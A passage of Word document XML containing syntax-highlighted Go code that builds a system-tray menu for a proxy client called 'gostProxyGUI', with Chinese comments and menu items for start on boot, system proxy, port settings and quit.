          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>}</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t>systray.SetIcon(iconBytes)</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>托盘名称，暂时未看到效果，不清楚该字符串显示在哪里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray.SetTitle(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"gostProxyGUI"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>鼠标指针移动，默认显示字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray.SetTooltip(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"gostProxyGUI"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>添加点击托盘菜单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>go func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>【添加一级菜单内容】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>暂不清楚</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray.AddMenuItem()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>tooltip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>有何效果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>开机启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mStartOnWithSystem := systray.AddMenuItemCheckbox(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>开机启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>系统代理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mSystemProxy := systray.AddMenuItemCheckbox(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>系统代理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>端口监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mPort := systray.AddMenuItem(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>端口设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>仅在托盘菜单中添加分割线，仅美观作用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray.AddSeparator()</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t>mQuit := systray.AddMenuItem(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>退出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>从写法上看，为了下面托盘的执行部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
